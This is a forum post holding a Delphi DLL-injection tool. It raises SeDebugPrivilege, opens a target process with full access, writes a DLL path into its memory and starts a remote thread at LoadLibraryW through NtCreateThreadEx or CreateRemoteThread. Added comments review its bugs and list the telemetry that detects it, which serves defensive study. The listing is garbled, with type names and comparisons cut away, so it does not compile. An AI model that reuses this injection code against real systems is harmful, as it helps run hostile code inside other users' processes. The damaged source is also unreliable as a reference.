dEEpEst
[LENGUAJE=delphi]program Inject;
// Console program that makes another process load a DLL: it takes a process id
// and a DLL path from the command line, writes the path into the target and
// starts a thread there at LoadLibraryW. MITRE ATT&CK catalogues this pattern
// as T1055.001 (Process Injection: Dynamic-link Library Injection).
// NOTE(review): the listing was damaged when the forum rendered it. The type
// names after several parameters and variables, and two comparison
// expressions, lost characters, so it does not compile as shown.
// Defender view: a run requests full access rights on the target process,
// performs a cross-process allocation and write, creates a remote thread whose
// start address is LoadLibraryW, and causes an image load of the supplied DLL
// in the target. Each of these is observable by endpoint telemetry.
{$APPTYPE CONSOLE}
{$IF CompilerVersion >= 21.0}
{$WEAKLINKRTTI ON}
{$RTTI EXPLICIT METHODS([]) PROPERTIES([]) FIELDS([])}
{$IFEND}
uses
Winapi.Windows;
// Function-pointer type used to call ntdll's NtCreateThreadEx, which is
// resolved by name at run time in RemoteThread. The parameter list is
// reproduced exactly as posted (damaged).
// NOTE(review): the parameter names u1, u2 and Unknown suggest the author did
// not know what those arguments mean; RemoteThread passes 0 / Nil for them.
Type
NtCreateThreadExProc = Function(Var hThread:THandle; Access
WORD; Attributes
ointer; hProcess:THandle; pStart
ointer; pParameter
ointer; Suspended:BOOL; StackSize, u1, u2
WORD; Unknown
ointer)
WORD; stdcall;
// Converts a string to an Integer with the RTL Val routine.
// The uses clause lists only Winapi.Windows, so this presumably stands in for
// the SysUtils function of the same name.
// Val stores its error position in E, and E is never examined: the caller (the
// main block, which passes the PID argument) cannot tell a malformed number
// from a valid one.
Function StrToInt(S: String): Integer;
Var
E: Integer;
Begin
Val(S, Result, E);
End;
// Queries the OS version with GetVersionExW and returns True only when the
// platform is NT-based and a test on dwMajorVersion succeeds.
// NOTE(review): the comparison on dwMajorVersion was truncated by the forum
// rendering, so the version boundary is not visible. RemoteThread uses
// NtCreateThreadEx when this returns False and CreateRemoteThread when it
// returns True; confirm the intended boundary against an undamaged copy.
// NOTE(review): the visible code never sets lpVersion.dwOSVersionInfoSize,
// which GetVersionExW requires. If the call fails, Result stays False and the
// NtCreateThreadEx branch is taken.
Function CheckOs():Boolean;
Var
lpVersion :TOSVersionInfoW;
begin
Result := False;
If GetVersionExW(lpVersion) Then
If (lpVersion.dwPlatformId = VER_PLATFORM_WIN32_NT) then
If (lpVersion.dwMajorVersion
Result := True;
end;
// Enables SeDebugPrivilege in the current process token.
// Steps visible here: open the process's own token with
// TOKEN_ADJUST_PRIVILEGES, look up the LUID of 'SeDebugPrivilege', then call
// AdjustTokenPrivileges with SE_PRIVILEGE_ENABLED. The token handle is closed
// on every path that opened it.
// Returns the Boolean result of AdjustTokenPrivileges, or False if the token
// could not be opened or the privilege name could not be resolved.
// Caveat: AdjustTokenPrivileges can return success without granting the
// privilege (GetLastError then reports ERROR_NOT_ALL_ASSIGNED). That case is
// not checked, so True does not prove the privilege is held.
// Defender view: the privilege can only be enabled if the account already has
// the "Debug programs" user right. Restricting that right removes this step
// for non-administrative users, and privilege adjustments can be audited
// (Windows Security event 4703 when that audit category is enabled).
Function EnableDebugPrivilege():Boolean;
Var
hToKen :THandle;
TokenPri :TTokenPrivileges;
dwRet
WORD;
begin
Result := False;
if(OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES, hToKen)) Then
begin
TokenPri.PrivilegeCount := 1;
If LookupPrivilegeValueW(Nil, 'SeDebugPrivilege', TokenPri.Privileges[0].Luid) Then
begin
TokenPri.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
Result := AdjustTokenPrivileges(hToken, False, TokenPri, SizeOf(TTokenPrivileges), Nil, dwRet);
end;
CloseHandle(hToKen);
end;
end;
// Starts a thread in the process identified by hProcess at address pThreadProc
// with pRemote as its single argument, and returns the new thread handle
// (0 if no thread could be created).
// The signature is reproduced as posted; the parameter types were lost in the
// forum rendering.
// Two creation paths:
//   - CheckOs() = False: resolve NtCreateThreadEx from ntdll.dll by name and
//     call it through the NtCreateThreadExProc pointer type. If the export is
//     missing or no handle comes back, jump to the Create label.
//   - CheckOs() = True, or fallback: the documented CreateRemoteThread API.
// The NtCreate label is declared and placed but no Goto targets it in this
// listing. The Goto Create statements jump into the Else branch.
// $1FFFFF is passed as the requested access mask for the new thread handle.
// The status value returned by NtCreateThreadEx is discarded; only hThread is
// inspected.
// Defender view: calling the ntdll export directly sidesteps user-mode hooks
// placed on CreateRemoteThread, but the thread creation is still visible to
// kernel thread-creation notifications (the source used for Sysmon Event ID 8,
// CreateRemoteThread), where source and target process differ.
Function RemoteThread(hProcess:THandle; pThreadProc
ointer; pRemote
ointer):THandle;
Label NtCreate, Create;
Var
pFunc
ointer;
hThread :THandle;
ThreadId
WORD;
begin
hThread := 0;
if Not CheckOs() then
begin
NtCreate:
pFunc := GetProcAddress(LoadLibraryW('ntdll.dll'), 'NtCreateThreadEx');
if pFunc = Nil then Goto Create;
NtCreateThreadExProc(pFunc)(hThread, $1FFFFF, Nil, hProcess, pThreadProc, pRemote, False, 0, 0, 0, Nil);
if hThread = 0 then Goto Create;
end Else
begin
Create:
hThread := CreateRemoteThread(hProcess, Nil, 0, pThreadProc, pRemote, 0, ThreadId);
end;
Result := hThread;
end;
// Makes the process with id dwPID call LoadLibraryW on the path in szPath.
// The signature is reproduced as posted; the parameter types were lost in the
// forum rendering.
// Sequence visible in the body:
//   1. EnableDebugPrivilege must return True, otherwise nothing is attempted.
//   2. OpenProcess with PROCESS_ALL_ACCESS on the target.
//   3. VirtualAllocEx reserves uSize bytes in the target, requested as
//      PAGE_EXECUTE_READWRITE although only a path string is stored there.
//   4. WriteProcessMemory copies the path; a short write aborts.
//   5. The address of LoadLibraryW is resolved in this process and handed to
//      RemoteThread as the start address, with the remote buffer as argument.
// Returns False on any failed step.
// NOTE(review): the expression assigned to Result after RemoteThread lost its
// comparison operator in the forum rendering; presumably it tests the thread
// handle against 0.
// Issues a reviewer would raise on this block:
//   - uSize is the string's byte length plus 4. A WideChar terminator is 2
//     bytes, so the write reads 2 bytes past the end of the local string.
//   - The VirtualAllocEx result is not checked before use.
//   - hProcess is never closed and the remote allocation is never freed.
//   - CloseHandle(hThread) runs even when hThread is 0.
//   - The code neither waits for the thread nor reads its exit code, so a True
//     result means "thread created", not "DLL loaded".
// Defender view: this is a well-known, high-signal sequence. Relevant
// telemetry is Sysmon Event ID 10 (ProcessAccess) showing full access to the
// target, Event ID 8 with LoadLibraryW as the start function, and Event ID 7
// (ImageLoad) for the DLL in the target. The leftover allocation holding a DLL
// path is an artifact for memory forensics. Protected-process settings and
// code-integrity policies that restrict which images a process may load limit
// where this works.
Function InjectDll2Pid(szPath
WideChar; dwPID
WORD):Boolean;
Var
hProcess :THandle;
hThread :THandle;
szRemote
WideChar;
uSize :SIZE_T;
uWrite :SIZE_T;
pStartAddr
ointer;
begin
Result := False;
if EnableDebugPrivilege then
begin
hProcess := OpenProcess(PROCESS_ALL_ACCESS, false, dwPID);
if hProcess > 0 then
begin
uSize := lstrlenW(szPath) * 2 + 4;
szRemote := VirtualAllocEx(hProcess, Nil, uSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if WriteProcessMemory(hProcess, szRemote, szPath, uSize, uWrite) And (uWrite = uSize) then
begin
pStartAddr := GetProcAddress(LoadLibrary('Kernel32.dll'), 'LoadLibraryW');
hThread := RemoteThread(hProcess, pStartAddr, szRemote);
Result := hThread 0;
CloseHandle(hThread);
end;
end;
end;
end;
// Program entry point. Command-line argument 1 is parsed as the target process
// id and argument 2 is used as the DLL path (InjectDll2Pid takes the path
// first, then the id).
// The argument count is not checked and the id is not validated (StrToInt
// ignores parse errors). The only output is the success message; every failure
// path exits silently.
// The trailing [/LENGUAJE] is the forum's closing code tag, not Delphi source.
begin
If InjectDll2Pid(PWideChar(ParamStr(2)), StrToInt(ParamStr(1))) Then
begin
Writeln('RemoteThread Ok!');
end;
end.[/LENGUAJE]